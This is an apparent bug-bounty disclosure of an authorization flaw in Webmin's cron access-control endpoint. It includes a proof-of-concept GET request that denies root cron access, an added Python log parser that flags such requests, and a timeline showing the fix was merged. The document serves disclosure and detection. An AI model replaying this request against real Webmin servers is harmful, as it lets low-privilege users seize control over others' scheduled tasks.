Improper Authorization in webmin/webmin


Reported on Feb 17th 2022


The /cron/save_allow.cgi endpoint is accessible to any authenticated low-privilege user, which lets such a user control other users' access to cron jobs. They can allow or deny other users access to cron jobs, affecting the Scheduled Cron Jobs module.

Proof of Concept

Affected Endpoint:

GET http://{HOST}/cron/save_allow.cgi



Example request that denies root access to cron:

GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1
Host: jumphost:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-no-links: 1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: save_allow.cgi
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://jumphost:10000/cron/edit_allow.cgi?xnavigation=1
Cookie: redirect=1; testing=1; sid=092a4f34132757770ba9c9c353760197


This vulnerability lets a user modify or restrict access to a system function outside that user's own privilege limits.
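As an added defensive example (not part of the original report and not Webmin's own code), the following Python parses constructed access-log lines, assumed to be in Common Log Format with the authenticated Webmin user in the third field, and flags every request to /cron/save_allow.cgi, marking requests from accounts outside an assumed set of trusted administrators as suspicious. The report does not state what the mode value means, so it is reported as-is.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not from the report): Common Log Format with
# the authenticated user in the third field. Usernames and addresses are made up.
SAMPLE_LOG = """\
10.0.0.5 - alice [17/Feb/2022:10:01:02 +0000] "GET /cron/index.cgi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - alice [17/Feb/2022:10:01:09 +0000] "GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1" 302 0 "http://jumphost:10000/cron/edit_allow.cgi" "Mozilla/5.0"
10.0.0.9 - root [17/Feb/2022:10:05:00 +0000] "GET /cron/save_allow.cgi?allow=root%20bob&mode=1&deny= HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - bob [17/Feb/2022:10:06:30 +0000] "POST /cron/save_allow.cgi HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""
# Common Log Format fields: client, ident, user, time, request line, status, size.
CLF = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

ACL_ENDPOINT = "/cron/save_allow.cgi"

def parse_line(line):
    """Return the fields of one log line, or None if it is not CLF."""
    m = CLF.match(line)
    return m.groupdict() if m else None

def find_cron_acl_changes(log_text, trusted_admins):
    """Return every request to the cron ACL endpoint; a request from an account
    outside trusted_admins (an assumed allow-list) is marked suspicious."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if url.path != ACL_ENDPOINT:
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        # allow/deny are assumed whitespace-separated user lists; a POST body
        # is not logged, so those requests show empty lists.
        findings.append({
            "user": rec["user"],
            "client": rec["client"],
            "method": rec["method"],
            "mode": qs.get("mode", [None])[0],
            "allow": qs.get("allow", [""])[0].split(),
            "deny": qs.get("deny", [""])[0].split(),
            "suspicious": rec["user"] not in trusted_admins,
        })
    return findings
```

Running `find_cron_acl_changes(SAMPLE_LOG, {"root"})` over the sample flags alice's request that denies root, together with bob's POST, while root's own change is reported but not marked suspicious.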

We are processing your report and will contact the webmin team within 24 hours. 3 months ago
We have contacted a member of the webmin team and are waiting to hear back 3 months ago
webmin validated this vulnerability 3 months ago
Faisal Fs has been awarded the disclosure bounty
The fix bounty is now up for grabs
webmin confirmed that a fix has been merged on eeeea3 3 months ago
The fix bounty has been dropped
save_allow.cgi#L5-L17 has been validated